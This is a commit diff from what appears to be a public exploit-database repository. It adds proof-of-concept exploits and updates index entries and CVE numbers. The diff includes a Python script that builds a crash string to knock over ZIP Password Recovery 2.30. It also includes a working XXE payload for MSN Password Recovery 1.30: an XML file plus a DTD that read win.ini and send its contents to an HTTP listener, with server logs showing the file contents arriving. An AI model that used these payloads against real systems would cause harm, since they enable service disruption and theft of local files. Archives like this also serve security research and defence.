DB: 2020-01-10

8 changes to exploits/shellcodes ZIP Password Recovery 2.30 - 'ZIP File' Denial of Service (PoC) MSN Password Recovery 1.30 - XML External Entity Injection Cisco Wireless Controller 3.6.10E - Cross-Site Request Forgery Oracle Weblogic 10.3.6.0.0 - Remote Command Execution
2020-01-10 05:02:00 +00:00 · 2020-01-10 05:02:00 +00:00 · de1e6651e0
commit de1e6651e0
parent c7085a57b4
7 changed files with 214 additions and 3 deletions
--- a/exploits/hardware/webapps/47153.html
+++ b/exploits/hardware/webapps/47153.html
@ -4,6 +4,7 @@
 # Vendor Homepage: https://www.cisco.com
 # Exploit Author: Mehmet Önder Key
 # Website: htts://cloudvist.com
+# CVE: CVE-2019-12624
 # Description : The application interface allows users to perform certain
 actions via HTTP requests without performing any validity checks to verify
 the requests. This can be exploited to perform certain actions with
--- a/exploits/java/webapps/47895.py
+++ b/exploits/java/webapps/47895.py
--- a/exploits/php/webapps/47840.txt
+++ b/exploits/php/webapps/47840.txt
@ -6,7 +6,7 @@
 # Software Link: https://phpgurukul.com/hospital-management-system-in-php/
 # Version: v4.0
 # Tested on: Windows
-# CVE : N/A
+# CVE : CVE-2020-5192

 # The Hospital Management System 4.0 web application is vulnerable to
 # SQL injection in multiple areas, listed below are 5 of the prominent
--- a/exploits/php/webapps/47841.txt
+++ b/exploits/php/webapps/47841.txt
@ -6,7 +6,7 @@
 # Software Link: https://phpgurukul.com/hospital-management-system-in-php/
 # Version: v4.0
 # Tested on: Windows
-# CVE : N/A
+# CVE : CVE-2020-5191

 ================ 1. - Cross Site Scripting (Persistent) ================

--- a/exploits/windows/dos/47894.py
+++ b/exploits/windows/dos/47894.py
@ -0,0 +1,49 @@
+# Exploit Title: ZIP Password Recovery 2.30 - 'ZIP File' Denial of Service (PoC)
+# Exploit Author : ZwX
+# Exploit Date: 2020-01-08
+# Vendor Homepage : https://www.top-password.com/purchase.html
+# Link Software : https://www.top-password.com/download/ZIPPRSetup.exe
+# Tested on OS: Windows 10
+
+Proof of Concept (PoC):
+=======================
+
+1.Download and install ZIP Password Recovery
+2.Open the ZIP Password Recovery
+3.Run the python operating script that will create a file (poc.txt)
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Select Your ZIP File ' and Click on the button 'Next'
+6.ZIP Password Recovery Crashed
+
+#!/usr/bin/python
+
+DoS=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
+"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
+"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
+"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")
+
+poc = DoS
+file = open("poc.txt","w")
+file.write(poc)
+file.close()
+
+print "POC Created by ZwX"
--- a/exploits/xml/local/47896.txt
+++ b/exploits/xml/local/47896.txt
@ -0,0 +1,42 @@
+# Exploit Title: MSN Password Recovery 1.30 - XML External Entity Injection
+# Exploit Author: ZwX
+# Exploit Date: 2020-01-08
+# Vendor Homepage : https://www.top-password.com/
+# Software Link: https://www.top-password.com/download/MSNPRSetup.exe
+# Tested on OS: Windows 10
+
+
+[+] Exploit : (PoC)
+===================
+1) python -m SimpleHTTPServer 8000
+2) Create file (.xml)
+3) Create file Payload.dtd
+4) Open the software MSN Password Recovery
+5) Click the 'Help' button and a 'Msn Password Recovery' window opens
+6) Click the 'Favorites' tab and add in Path Current the path of your file (.XML) Ex : file:///C:/Users/ZwX/Desktop/file.xml
+7) Click the 'View' button
+8) External Entity Injection Successful
+
+
+[+] XXE.xml :
+==============
+<?xml version="1.0"?>
+<!DOCTYPE test [
+<!ENTITY % file SYSTEM "C:\Windows\win.ini">
+<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
+%dtd;]>
+<pwn>&send;</pwn>
+
+[+] Payload.dtd :
+=================
+<?xml version="1.0" encoding="UTF-8"?>
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
+%all;
+
+
+[+] Result Exploitation :
+=========================
+C:\>python -m SimpleHTTPServer 8000
+Serving HTTP on 0.0.0.0 port 8000 ...
+ZwX-PC - - [08/Jan/2020 20:32:36] "GET /payload.dtd HTTP/1.1" 200 -
+ZwX-PC - - [08/Jan/2020 20:32:37] "GET /?;%20for%2016-bit%20app%20support[fonts][extensions][mci%20extensions][files][Mail]MAPI=1 HTTP/1.1" 200 -
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6647,6 +6647,7 @@ id,file,description,date,author,type,platform,port
 47871,exploits/windows/dos/47871.txt,"FTPGetter Professional 5.97.0.223 -  Denial of Service (PoC)",2020-01-06,FULLSHADE,dos,windows,
 47873,exploits/windows/dos/47873.py,"Duplicate Cleaner Pro 4 - Denial of Service (PoC)",2020-01-06,stresser,dos,windows,
 47878,exploits/windows/dos/47878.txt,"Microsoft Outlook VCF cards - Denial of Service (PoC)",2020-01-06,hyp3rlinx,dos,windows,
+47894,exploits/windows/dos/47894.py,"ZIP Password Recovery 2.30 - 'ZIP File' Denial of Service (PoC)",2020-01-09,ZwX,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10885,6 +10886,7 @@ id,file,description,date,author,type,platform,port
 47852,exploits/windows/local/47852.txt,"Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path",2020-01-06,ZwX,local,windows,
 47880,exploits/windows/local/47880.cc,"Windows - Shell COM Server Registrar Local Privilege Escalation",2020-01-02,0vercl0k,local,windows,
 47883,exploits/windows/local/47883.txt,"AnyDesk 5.4.0 - Unquoted Service Path",2020-01-07,SajjadBnd,local,windows,
+47896,exploits/xml/local/47896.txt,"MSN Password Recovery 1.30 - XML External Entity Injection",2020-01-09,ZwX,local,xml,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -41877,7 +41879,7 @@ id,file,description,date,author,type,platform,port
 47146,exploits/php/webapps/47146.txt,"REDCap < 9.1.2 - Cross-Site Scripting",2019-07-19,"Alexandre ZANNI",webapps,php,
 47150,exploits/linux/webapps/47150.txt,"Axway SecureTransport 5 - Unauthenticated XML Injection",2019-07-22,"Dominik Penner",webapps,linux,
 47152,exploits/php/webapps/47152.txt,"NoviSmart CMS - SQL injection",2019-07-24,n1x_,webapps,php,
-47153,exploits/hardware/webapps/47153.html,"Cisco Wireless Controller 3.6.10E - Cross-Site Request Forgery",2019-07-24,"Mehmet Onder",webapps,hardware,
+47153,exploits/hardware/webapps/47153.txt,"Cisco Wireless Controller 3.6.10E - Cross-Site Request Forgery",2019-07-24,"Mehmet Onder",webapps,hardware,
 47154,exploits/php/webapps/47154.py,"WordPress Plugin Hybrid Composer 1.4.6 - Improper Access Restrictions",2019-07-24,yasin,webapps,php,
 47159,exploits/php/webapps/47159.txt,"Ovidentia 8.4.3 - Cross-Site Scripting",2019-07-25,n3k00n3,webapps,php,80
 47160,exploits/php/webapps/47160.txt,"Ovidentia 8.4.3 - SQL Injection",2019-07-25,UserX,webapps,php,80
@ -42194,3 +42196,4 @@ id,file,description,date,author,type,platform,port
 47887,exploits/php/webapps/47887.py,"Online Book Store 1.0 - Unauthenticated Remote Code Execution",2020-01-08,Tib3rius,webapps,php,
 47892,exploits/java/webapps/47892.txt,"Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape",2020-01-08,hantwister,webapps,java,
 47893,exploits/hardware/webapps/47893.js,"Sony Playstation 4 (PS4) < 6.72 - WebKit Code Execution (PoC)",2019-12-31,"TJ Corley",webapps,hardware,
+47895,exploits/java/webapps/47895.py,"Oracle Weblogic 10.3.6.0.0 - Remote Command Execution",2020-01-09,james,webapps,java,